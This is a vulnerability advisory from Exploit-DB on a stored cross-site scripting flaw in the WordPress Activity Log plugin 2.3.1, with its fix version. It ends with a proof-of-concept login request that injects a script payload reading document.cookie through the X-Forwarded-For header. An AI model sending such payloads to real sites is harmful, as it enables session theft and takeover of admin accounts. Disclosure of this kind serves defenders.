WordPress Plugin Activity Log 2.3.1 – Persistent Cross-Site Scripting

• Exploit Database
• 17 阅读

• 作者： Han Sahin
  日期： 2016-07-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40083/

• Persistent Cross-Site Scripting in WordPress Activity Log plugin
  Han Sahin
  
  Abstract
  
  A stored Cross-Site Scripting (XSS) vulnerability has been found in the WordPress Activity Log plugin. By using this vulnerability an attacker can inject malicious JavaScript code into the application, which will execute within the browser of any user who views the Activity Log, in general WP admin.
  
  Tested versions
  
  This issue was successfully tested on WordPress Activity Log plugin version 2.3.1.
  
  Fix
  
  This issue has been fixed in version 2.3.2 of the WordPress Activity Log plugin. The updated plugin can be downloaded from the following location: https://downloads.wordpress.org/plugin/aryo-activity-log.2.3.2.zip.
  
  Introduction
  
  The WordPress Activity Log plugin allows monitoring and tracking of site activity on a WordPress site. A stored Cross-Site Scripting vulnerability has been discovered in the WordPress Activity Log plugin which allows an unauthenticated attacker to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the Activity Log (WP admin).
  
  Details
  
  The WordPress Activity Log plugin fails to sufficiently check input supplied to the X-Forwarded-For HTTP header and perform output encoding when the input is presented in a "wrong password event". As a result the malicious request will be stored in the Activity Log page, executing the payload when an unsuspecting user views this specific page.
  
  An attacker can use this vulnerability to perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes or deliver malware.
  
  Persistent Cross-Site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users (victims).
  
  
  Proof of concept
  
  This vulnerability can be demonstrated by submitting an XFF header similar to the following:
  
  POST /wp-login.php HTTP/1.1
  Host: 192.168.28.135
  Content-Length: 113
  Cache-Control: max-age=0
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36
  (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
  Content-Type: application/x-www-form-urlencoded
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Referer: http://
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US,en;q=0.8,nl;q=0.6
  X-Forwarded-For: <script>alert(document.cookie);</script>
  Connection: close
  
  log=wordpress&pwd=sdsdssdsdsd&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.28.135%2Fwp-admin%2F&testcookie=1